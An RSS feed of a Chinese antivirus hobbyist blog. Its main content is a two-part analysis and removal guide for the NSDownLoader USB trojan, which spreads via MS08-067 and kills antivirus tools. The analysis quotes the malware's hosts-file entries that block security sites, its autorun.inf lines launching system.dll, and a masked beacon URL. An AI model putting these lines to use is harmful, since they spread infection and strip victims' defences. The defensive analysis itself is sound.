<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[清新阳光]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[流行病毒解决方案 本空间所有文章仅代表个人观点 如需转载 请注明出处]]></description>
<link>http://hi.baidu.com/newcenturysun</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[世界所有的网站为何一夜之间被&#34;挂马&#34;??]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/28af7138b6f6522497ddd83d.html]]></link>
        <description><![CDATA[
		
		<p>2009年1月31日</p>
<p>一个值得纪念的日子，世界上几乎所有的网站都被&ldquo;挂马&rdquo; 包括GOOGLE 百度 搜狐 新浪 等等著名网站无一幸免～～</p>
<p>截图留念</p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/656bfff8f5372010d9f9fdaf.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/99a68a5186ce7e3b42a75ba8.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/4d7ee7de81f0fd4b94ee37aa.jpg"></p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/797f5bc2fce0f42ae5dd3bb5.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1">
<p><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/6437227a6b373bf22e73b3b7.jpg"></p>
<p> </p>
<p> </p>
<div forimg="1"><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/1030aa0982ac873b6a60fb7b.jpg"></div>
<p> </p>
<p> </p>
<p>23:20分左右 全世界的网站被同时清除了&ldquo;网马&rdquo;～～ 感谢GOOGLE</p>
</div>
</div>
</div>
</div>
</div> <a href="http://hi.baidu.com/newcenturysun/blog/item/28af7138b6f6522497ddd83d.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%CF%D0%C0%B4%CE%DE%CA%C2">闲来无事</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/28af7138b6f6522497ddd83d.html#comment">查看评论</a>]]></description>
        <pubDate>2009-01-31  22:57</pubDate>
        <category><![CDATA[闲来无事]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/28af7138b6f6522497ddd83d.html</guid>
</item>

<item>
        <title><![CDATA[欢迎参与卡卡论坛实习生活动（友情推广）]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/527eec1913a1bd7ddab4bd95.html]]></link>
        <description><![CDATA[
		
		<p>瑞星公司于近期招聘一批论坛实习生，要求： <br>
1.在校大学生； <br>
2.对信息安全相关知识感兴趣，； <br>
<br>
我们将提供： <br>
1.正规的瑞星公司实习证明； <br>
2.免费的反病毒知识培训课程； <br>
3.大量的实践机会； <br>
4.优秀实习生将直接进入瑞星公司工作。 <br>
<br>
详情请参见：<a href="http://bbs.ikaka.com/showtopic-8576304.aspx" target="_blank"><font color="#261cdc">http://bbs.ikaka.com/showtopic-8576304.aspx</font></a></p>
<p>免费的技术培训，快来哦～～<img src="http://img.baidu.com/hi/jx/j_0028.gif"></p> <a href="http://hi.baidu.com/newcenturysun/blog/item/527eec1913a1bd7ddab4bd95.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%CF%D0%C0%B4%CE%DE%CA%C2">闲来无事</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/527eec1913a1bd7ddab4bd95.html#comment">查看评论</a>]]></description>
        <pubDate>2009-01-02  23:39</pubDate>
        <category><![CDATA[闲来无事]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/527eec1913a1bd7ddab4bd95.html</guid>
</item>

<item>
        <title><![CDATA[木马清道夫网站被挂马～]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/2473043845689bf5b211c706.html]]></link>
        <description><![CDATA[
		
		<p><img src="http://img.baidu.com/hi/jx/j_0063.gif">挂马无处不在</p>
<p> <img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/newcenturysun/pic/item/91a2bd779c3ec406b051b91e.jpg"></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%B2%A1%B6%BE%B7%C0%B7%B6%D3%EB%C9%B1%B3%FD">病毒防范与杀除</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/2473043845689bf5b211c706.html#comment">查看评论</a>]]></description>
        <pubDate>2008-12-13  11:38</pubDate>
        <category><![CDATA[病毒防范与杀除]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/2473043845689bf5b211c706.html</guid>
</item>

<item>
        <title><![CDATA[警惕NSDownLoader木马下载器(U盘病毒system.dll)之二]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/142c678d773a0415b31bbae1.html]]></link>
        <description><![CDATA[
		
		<p>接 ：<span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">警惕</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">NSDownLoader</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">木马下载器</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">(U</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">盘病毒</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">system.dll)之一</font></span></p>
<p>e.每隔15分钟启动一次本机的lanmanserver与Browser服务，扫描本网段内的其他机器，打开对方的4444端口。在本机临时文件夹内创建一个???????.txt的文件（?代表随机数字），并写入一些代码，利用批处理和debug将其&ldquo;重组&rdquo;成dll文件，利用rundll32.exe加载，并利用MS08-067漏洞攻击其他机器，同时将该病毒文件复制过去。</p>
<p>f.释放appwinproc.dll到系统目录，设置窗口挂钩，查找带有如下字样的窗口&ldquo;金山毒霸，360安全卫士, 江民, 木马, 专杀,下载者，NOD32，卡巴斯基…&rdquo;，找到后调用TerminateProcess函数结束相应进程。</p>
<p>g.修改hosts文件屏蔽常见安全网站</p>
<p>127.0.0.1 <a href="http://www.360.cn/">www.360.cn</a></p>
<p>127.0.0.1 <a href="http://www.360safe.cn/">www.360safe.cn</a></p>
<p>127.0.0.1 <a href="http://www.360safe.com/">www.360safe.com</a></p>
<p>127.0.0.1 <a href="http://www.chinakv.com/">www.chinakv.com</a></p>
<p>127.0.0.1 <a href="http://www.rising.com.cn/">www.rising.com.cn</a></p>
<p>127.0.0.1 rising.com.cn</p>
<p>127.0.0.1 dl.jiangmin.com</p>
<p>127.0.0.1 jiangmin.com</p>
<p>127.0.0.1 <a href="http://www.jiangmin.com/">www.jiangmin.com</a></p>
<p>127.0.0.1 <a href="http://www.duba.net/">www.duba.net</a></p>
<p>127.0.0.1 <a href="http://www.eset.com.cn/">www.eset.com.cn</a></p>
<p>127.0.0.1 <a href="http://www.nod32.com/">www.nod32.com</a></p>
<p>127.0.0.1 shadu.duba.net</p>
<p>127.0.0.1 union.kingsoft.com</p>
<p>127.0.0.1 <a href="http://www.kaspersky.com.cn/">www.kaspersky.com.cn</a></p>
<p>127.0.0.1 kaspersky.com.cn</p>
<p>127.0.0.1 virustotal.com</p>
<p>127.0.0.1 <a href="http://www.kaspersky.com/">www.kaspersky.com</a></p>
<p>127.0.0.1 <a href="http://www.cnnod32.cn/">www.cnnod32.cn</a></p>
<p>127.0.0.1 <a href="http://www.lanniao.org/">www.lanniao.org</a></p>
<p>127.0.0.1 <a href="http://www.nod32club.com/">www.nod32club.com</a></p>
<p>127.0.0.1 <a href="http://www.dswlab.com/">www.dswlab.com</a></p>
<p>127.0.0.1 bbs.sucop.com</p>
<p>127.0.0.1 <a href="http://www.virustotal.com/">www.virustotal.com</a></p>
<p>127.0.0.1 tool.ikaka.com</p>
<p>127.0.0.1 360.qihoo.com</p>
<p>h.向除了A,B盘之外的盘符中创建autorun.inf和system.dll(即dll??.dll),</p>
<p>autorun.inf内容如下：</p>
<p>[autorun]</p>
<p>shell\open\command=rundll32 system.dll,explore</p>
<p>shell\explore\command=rundll32 system.dll,explore</p>
<p>利用rundll32.exe加载该dll</p>
<p>i.获得本机的mac地址，操作系统版本等信息发送到<a href="http://tk123.********.cn/pk/123/count.asp">http://tk123.********.cn/pk/123/count.asp</a></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-"><strong><font color="#ff0000">判别方法：</font></strong>通过</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">sreng</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">日志判断：</span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"><font face="Times New Roman"><span style="mso-bidi-font-size: 10.5pt; mso-fareast-"><span style="mso-list: Ignore">1.<span style="font: 7pt  Times New Roman ">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></span></span><span style="mso-bidi-font-size: 10.5pt">IFEO</span></font><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">项目可以看到很多杀毒软件被劫持</span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l0 level1 lfo1"><span style="mso-bidi-font-size: 10.5pt; mso-fareast-"><span style="mso-list: Ignore"><font face="Times New Roman">2.<span style="font: 7pt  Times New Roman ">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">查看系统服务发现如下服务的</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">dll</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">版本变为</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">N/A(</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">被病毒替换所致</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">)</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">如</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">[Application Management / AppMgmt][Stopped/Manual Start]</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">&lt;C:\WINDOWS\system32\svchost.exe -k netsvcs--&gt;%SystemRoot%\System32\appmgmts.dll&gt;&lt;N/A&gt;</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">[Task Scheduler / Schedule][Stopped/Auto Start]</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman"><span style="mso-spacerun: yes">  </span>&lt;C:\WINDOWS\System32\svchost.exe -k netsvcs--&gt;%SystemRoot%\system32\schedsvc.dll&gt;&lt;N/A&gt;</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">[System Restore Service / srservice][Stopped/Auto Start]</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman"><span style="mso-spacerun: yes">  </span>&lt;C:\WINDOWS\system32\svchost.exe -k netsvcs--&gt;C:\WINDOWS\system32\srsvc.dll&gt;&lt;N/A&gt;</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">[Windows Image Acquisition (WIA) / stisvc][Stopped/Manual Start]</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman"><span style="mso-spacerun: yes">  </span>&lt;C:\WINDOWS\system32\svchost.exe -k imgsvc--&gt;%SystemRoot%\system32\wiaservc.dll&gt;&lt;N/A&gt;</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">[Windows Time / W32Time][Stopped/Auto Start]</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman"><span style="mso-spacerun: yes">  </span>&lt;C:\WINDOWS\System32\svchost.exe -k netsvcs--&gt;C:\WINDOWS\system32\w32time.dll&gt;&lt;N/A&gt;</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman"> </font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman"> </font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-"><strong><font color="#ff0000">解决方法：</font></strong></span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">下载</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">sreng</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">工具</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">,XDelbox</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">工具。</span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l1 level1 lfo2"><span style="mso-bidi-font-size: 10.5pt; mso-fareast-"><span style="mso-list: Ignore"><font face="Times New Roman">1.<span style="font: 7pt  Times New Roman ">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">断开网络，开始</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">&mdash;</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">运行</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">&mdash;</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">输入</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">services.msc</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">，把下列服务设置为&ldquo;禁用&rdquo;：</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Application Management</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Task Scheduler</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">System Restore Service</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Windows Image Acquisition (WIA)</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Windows Time</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l1 level1 lfo2"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l1 level1 lfo2"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt 18pt; text-indent: -18pt; mso-list: l1 level1 lfo2"><span style="mso-bidi-font-size: 10.5pt; mso-fareast-"><span style="mso-list: Ignore"><font face="Times New Roman">2.<span style="font: 7pt  Times New Roman ">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  </span></font></span></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">使用</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">Xdelbox</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">删除如下文件</span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">%temp%\dll???.dll</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">（</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">???</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">代表随机数字）</span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">%SystemRoot%\System32\Nskhelper2.sys</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">%SystemRoot%\System32\NSPASS?.sys (?</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">代表数字，不止一个</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">)</font></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">%</font></span><span style=" mso-bidi-font-size: 10.5pt">SystemRoot%\System32\</span><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-font-kerning: 0pt; mso-bidi- mso-ansi-">appwinproc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-font-kerning: 0pt; mso-bidi- mso-ansi-">以及各个分区下面的system.dll,autorun.inf文件</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">3.</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">重启计算机，打开我的电脑</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">&gt;&gt;</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">菜单栏</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">&gt;&gt;</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">工具</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">&gt;&gt;</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">文件夹选项</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">&gt;&gt;</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">查看</span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p><span style="font-size: 10.5pt;  mso-ascii- mso-hansi- mso-font-kerning: 1.0pt; mso-bidi- mso-ansi- mso-fareast- mso-bidi-">选择显示所有文件和文件夹，并把隐藏受保护的操作系统文件的钩去掉。</span></p>
<span style="font-size: 10.5pt;  mso-ascii- mso-hansi- mso-font-kerning: 1.0pt; mso-bidi- mso-ansi- mso-fareast- mso-bidi-">
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">4.</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">打开</span><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">%SystemRoot%\system32\</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">dllcache</font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">文件夹</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman"> </font></span><span style=" mso-bidi-font-size: 10.5pt; mso-ascii- mso-hansi-">依次找到</span><span style="mso-bidi-font-size: 10.5pt"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">schedsvc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">appmgmts.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">srsvc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">w32time.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">wiaservc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi- mso-ansi-">文件</span><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-"></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi- mso-ansi-">分别覆盖掉</span><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">%SystemRoot%\system32\schedsvc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">%SystemRoot%\System32\appmgmts.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">%SystemRoot%\System32\srsvc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">%SystemRoot%\System32\w32time.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">%SystemRoot%\system32\wiaservc.dll</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">5.</span><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi-">使用<span>sreng</span>删除所有<span>IFEO</span>映像劫持项目<span></span></span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt; text-align: left; mso-layout-grid-align: none" align="left"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi- mso-ansi-">6.使用杀毒软件全盘杀毒清除其他木马和病毒</span></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="color: black;  mso-bidi-font-size: 10.5pt; mso-hansi- mso-font-kerning: 0pt; mso-bidi- mso-ansi-"> </span></p>
<p> </p>
</span>  <a href="http://hi.baidu.com/newcenturysun/blog/item/142c678d773a0415b31bbae1.html">阅读全文</a>
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/newcenturysun/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/newcenturysun/blog/item/142c678d773a0415b31bbae1.html#comment">查看评论</a>]]></description>
        <pubDate>2008-11-27  00:01</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[newcenturysun]]></author>
		<guid>http://hi.baidu.com/newcenturysun/blog/item/142c678d773a0415b31bbae1.html</guid>
</item>

<item>
        <title><![CDATA[警惕NSDownLoader木马下载器(U盘病毒system.dll)之一]]></title>
        <link><![CDATA[http://hi.baidu.com/newcenturysun/blog/item/4bc39e13616a5fd7f7039ee0.html]]></link>
        <description><![CDATA[
		
		<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><font color="#ff0000"><span style="mso-bidi-font-size: 10.5pt"><font size="2">作者：清新阳光&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  ( </font><a href="http://hi.baidu.com/newcenturysun"><font color="#ff0000" size="2">http://hi.baidu.com/newcenturysun</font></a><font size="2"><font color="#ff0000">)<br>
日期：2008/11/26&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  (转载请保留此声明)</font><font color="#000000"> </font></font></span></font></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><strong><font color="#ff0000"><span style="mso-bidi-font-size: 10.5pt">这是一个结合了机器狗，</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">AV</font></span><span style="mso-bidi-font-size: 10.5pt">终结者和利用</span><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">MS08067</font></span><span style="mso-bidi-font-size: 10.5pt">漏洞攻击的复合型下载者病毒，近几天非常流行，并且预计该病毒在近期会成泛滥之势，希望大家注意！</span></font></strong></p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"> </p>
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt">以下是该病毒的某一变种的分析：</span></p>
<span style="mso-bidi-font-size: 10.5pt">
<p class="MsoNormal" style="margin: 0cm 0cm 0pt"><span style="mso-bidi-font-size: 10.5pt"><font face="Times New Roman">1.</font></span><span style="mso-bidi-font-size: 10.5pt">病毒运行后，会调用检测是否有调试器存在</span></p>
